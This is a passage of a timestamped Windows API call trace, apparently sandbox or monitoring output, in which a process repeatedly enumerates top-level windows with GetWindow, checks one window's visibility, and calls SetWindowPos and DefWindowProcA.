(hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.499] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.500] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.500] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.500] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.500] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.500] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.500] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.500] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.500] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.500] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.500] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.500] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.500] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.500] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.500] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.500] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.500] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.500] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.500] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.500] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.500] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.500] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.500] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.500] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.500] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.500] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.501] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.501] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.501] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.501] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.501] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.501] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.501] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.501] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.501] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.501] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.501] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.501] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.501] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.501] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.501] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.501] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.501] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.501] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.501] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.501] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.501] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.501] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.501] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.501] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.502] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.502] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.502] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.502] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.502] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.502] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.502] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.502] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.502] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.502] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.502] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.502] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.502] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.502] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.502] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.502] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.502] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.502] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.502] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.502] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.502] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.502] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.502] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.502] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.502] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.503] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.503] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.503] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.503] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.503] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.503] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.503] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.503] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.503] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.503] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.503] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.503] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.503] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.503] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.503] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.503] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.503] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.503] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.503] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.503] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.503] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.503] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.504] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.504] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.504] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.504] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.504] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.504] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.504] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.504] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.504] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.504] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.504] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.504] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.504] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.504] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.504] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.504] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.504] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.504] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.504] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.504] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.504] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.504] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.504] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.504] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.504] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.504] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.504] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.504] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.504] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.504] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.504] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.504] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.504] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.505] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.505] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.505] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.505] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.505] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.505] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.505] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.505] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.505] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.505] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.505] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.505] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.505] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.505] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.505] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.505] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.505] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.505] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.505] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.505] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.505] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.505] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.505] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.505] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.505] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.505] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.505] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.505] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.505] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.505] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.505] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.506] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.506] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.506] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.506] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.506] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.506] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.506] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.506] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.506] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.506] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.506] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.506] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.506] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.506] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.506] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.506] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.506] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.506] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.506] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.506] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.506] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.506] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.506] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.506] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.506] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.506] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.506] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.506] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.506] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.506] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.506] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.507] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.507] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.507] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.507] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.507] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.507] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.507] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.507] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.507] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.507] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.507] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.507] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.507] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.507] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.507] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.507] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.508] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.508] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.508] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.508] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.508] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.508] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.508] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.508] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.508] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.508] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.508] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.508] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.508] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.508] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.508] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.508] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.508] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.508] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.508] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.508] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.508] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.508] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.508] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.508] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.509] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.509] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.509] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.509] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.509] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.509] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.509] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.509] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.509] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.509] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.509] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.509] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.509] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.509] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.509] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.509] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.509] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.509] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.509] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.509] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.509] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.509] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.509] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.509] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.509] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.509] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.510] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.510] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.510] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.510] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.510] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.510] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.510] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.510] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.510] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.510] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.510] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.510] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.510] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.510] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.510] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.510] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.510] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.510] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.510] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.510] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.510] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.510] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.510] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.510] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.510] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.511] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.511] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.511] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.511] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.511] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.511] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.511] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.511] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.511] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.511] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.511] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.511] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.511] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.511] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.511] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.511] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.511] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.511] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.511] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.511] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.511] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.511] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.511] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.511] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.512] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.512] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.512] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.512] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.512] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.512] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.512] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.512] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.512] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.512] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.512] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.512] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.512] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.512] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.512] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.512] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.512] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.512] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.512] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.512] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.512] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.512] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.512] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.512] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.512] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.513] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.513] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.513] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.513] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.513] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.513] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.513] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.513] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.513] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.513] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.513] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.513] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.513] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.513] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.513] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.513] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.513] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.513] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.513] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.513] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.513] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.513] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.514] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.514] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.514] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.514] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.514] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.514] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.514] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.514] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.514] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.514] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.514] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.514] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.514] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.514] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.514] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.514] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.514] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.514] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.514] 